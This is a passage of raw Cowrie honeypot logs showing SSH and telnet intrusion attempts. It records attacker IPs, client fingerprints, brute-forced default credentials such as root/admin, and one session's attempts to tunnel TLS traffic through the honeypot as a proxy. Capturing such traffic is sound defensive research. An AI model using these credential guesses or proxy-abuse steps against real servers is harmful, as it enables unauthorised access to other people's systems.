exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T08:44:55.278901Z","src_ip":"185.156.73.233","session":"2096306d43a4"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:44:55.379610Z","src_ip":"185.156.73.233","session":"2096306d43a4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"34.251.75.6","dst_port":443,"src_ip":"185.156.73.233","src_port":34200,"message":"direct-tcp connection request to 34.251.75.6:443 from 127.0.0.1:34200","sensor":"my-vps","timestamp":"2025-08-31T08:44:56.772501Z","session":"2096306d43a4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"34.251.75.6","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd2\\xc7\\x100l\\xc4\\x81 \\xf6\\xf9Yh\\x8c\\xa3\\xe3F\\xafR\\x86\\x91n\\x9d+\\xb5Br\\x13AfhQ\\x91 \\x02\\xd6\\xaer6\\x10\\x17\\xe8\\xfa\\x019\\x99\\xa6\\xcc\\xb6%\\xc3]<J\\x0f\\xd6\\xa4\\xc0e\\xfd\\xc1\\xf2\\x15\\xaf\\x04j\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x15X\\xd9\\xe1\\r%\\xa4\\xb0'\\xaa\\x8b\\xba2\\x16\\x188e\\xdb\\xdb\\x9a\\xecmx\\xcf\\x9c\\xe9\\x1eW\\x81\\x96\\x1e\\x17\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 34.251.75.6:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd2\\xc7\\x100l\\xc4\\x81 \\xf6\\xf9Yh\\x8c\\xa3\\xe3F\\xafR\\x86\\x91n\\x9d+\\xb5Br\\x13AfhQ\\x91 \\x02\\xd6\\xaer6\\x10\\x17\\xe8\\xfa\\x019\\x99\\xa6\\xcc\\xb6%\\xc3]<J\\x0f\\xd6\\xa4\\xc0e\\xfd\\xc1\\xf2\\x15\\xaf\\x04j\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x15X\\xd9\\xe1\\r%\\xa4\\xb0'\\xaa\\x8b\\xba2\\x16\\x188e\\xdb\\xdb\\x9a\\xecmx\\xcf\\x9c\\xe9\\x1eW\\x81\\x96\\x1e\\x17\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T08:44:56.821979Z","src_ip":"185.156.73.233","session":"2096306d43a4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.53.112.242","dst_port":443,"src_ip":"185.156.73.233","src_port":34294,"message":"direct-tcp connection request to 23.53.112.242:443 from 127.0.0.1:34294","sensor":"my-vps","timestamp":"2025-08-31T08:44:56.940651Z","session":"2096306d43a4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.53.112.242","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x1aP$\\x80P\\xab\\x06-\\x8c\\x1bF\\x84;Y\\xb8\\xea\\x0f\\x80?\\xdc\\xdf\\x92\\x11\\x10PH\\xd3\\xdf\\xdeo\\x10\\xf4 \\xb6\\x8a\\x84\\x17lv\\xc0\\xe5\\xf0\\xfa\\x1c\\xea~\\xb0\\'\\xb7\\xbd_\\xdfx,\\xc8J\\x02\\xef4\\x01\\xbd\\x9cxH\\xa2\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \"\\xd3\\xa6V \\xaa\\x9c-}1\\x13O\\xea\\xc6\\xa2T\\x9f\\x8d\\xbf%\\xb3\\xe8\\xee\\xa2k\\xa2\\x85\\xf7\\xf0\\x84\\xc6.\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 23.53.112.242:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x1aP$\\x80P\\xab\\x06-\\x8c\\x1bF\\x84;Y\\xb8\\xea\\x0f\\x80?\\xdc\\xdf\\x92\\x11\\x10PH\\xd3\\xdf\\xdeo\\x10\\xf4 \\xb6\\x8a\\x84\\x17lv\\xc0\\xe5\\xf0\\xfa\\x1c\\xea~\\xb0\\'\\xb7\\xbd_\\xdfx,\\xc8J\\x02\\xef4\\x01\\xbd\\x9cxH\\xa2\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \"\\xd3\\xa6V \\xaa\\x9c-}1\\x13O\\xea\\xc6\\xa2T\\x9f\\x8d\\xbf%\\xb3\\xe8\\xee\\xa2k\\xa2\\x85\\xf7\\xf0\\x84\\xc6.\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-31T08:44:57.024833Z","src_ip":"185.156.73.233","session":"2096306d43a4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.36.36","dst_port":443,"src_ip":"185.156.73.233","src_port":34440,"message":"direct-tcp connection request to 142.251.36.36:443 from 127.0.0.1:34440","sensor":"my-vps","timestamp":"2025-08-31T08:44:57.081989Z","session":"2096306d43a4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.36.36","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xdf JC\\xed\\x93\\xe1\\xb0d4\\xb8\\x84=\\x1d\\xc1\\x03d\\xf7\\xf1\\xe0C\\x0c\\xc9\\t\\xbd%\\x07IQ\\xdd\\xddy #6+\\xcc(\\xff\\xea\\xd8\\xcc*RwM\\x12\\x0c\\xfd\\xf5\\x83#\\x85Q\\x83?4\\xa0Z\\x8db\\x108\\n\\xf3\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\n\\xcb9j\\xa2\\xf16\\xf7\\x1dE'+\\x0c\\xf3\\xdb\\x8e\\x9aYc\\xce\\xea\\xadz\\xc9d\\x1a!q\\xda\\x9a\\xd62\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.36.36:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xdf JC\\xed\\x93\\xe1\\xb0d4\\xb8\\x84=\\x1d\\xc1\\x03d\\xf7\\xf1\\xe0C\\x0c\\xc9\\t\\xbd%\\x07IQ\\xdd\\xddy #6+\\xcc(\\xff\\xea\\xd8\\xcc*RwM\\x12\\x0c\\xfd\\xf5\\x83#\\x85Q\\x83?4\\xa0Z\\x8db\\x108\\n\\xf3\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\n\\xcb9j\\xa2\\xf16\\xf7\\x1dE'+\\x0c\\xf3\\xdb\\x8e\\x9aYc\\xce\\xea\\xadz\\xc9d\\x1a!q\\xda\\x9a\\xd62\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T08:44:57.122154Z","src_ip":"185.156.73.233","session":"2096306d43a4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:44:57.143404Z","src_ip":"185.156.73.233","session":"2096306d43a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47540,"dst_ip":"1.2.3.4","dst_port":23,"session":"c6763ccb0c57","protocol":"telnet","message":"New connection: 212.227.235.229:47540 (1.2.3.4:23) [session: c6763ccb0c57]","sensor":"my-vps","timestamp":"2025-08-31T08:44:59.636983Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:44:59.826358Z","src_ip":"212.227.235.229","session":"c6763ccb0c57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:44:59.843306Z","src_ip":"212.227.235.229","session":"c6763ccb0c57"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-31T08:44:59.844516Z","src_ip":"212.227.235.229","session":"c6763ccb0c57"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-31T08:44:59.845199Z","src_ip":"212.227.235.229","session":"c6763ccb0c57"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56598,"dst_ip":"1.2.3.4","dst_port":22,"session":"d59417f1bed9","protocol":"ssh","message":"New connection: 217.72.205.35:56598 (1.2.3.4:22) [session: d59417f1bed9]","sensor":"my-vps","timestamp":"2025-08-31T08:45:00.375118Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:00.376176Z","src_ip":"217.72.205.35","session":"d59417f1bed9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55926,"dst_ip":"1.2.3.4","dst_port":22,"session":"25d6668169bf","protocol":"ssh","message":"New connection: 212.227.235.229:55926 (1.2.3.4:22) [session: 25d6668169bf]","sensor":"my-vps","timestamp":"2025-08-31T08:45:02.757004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:45:02.758350Z","src_ip":"212.227.235.229","session":"25d6668169bf"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256",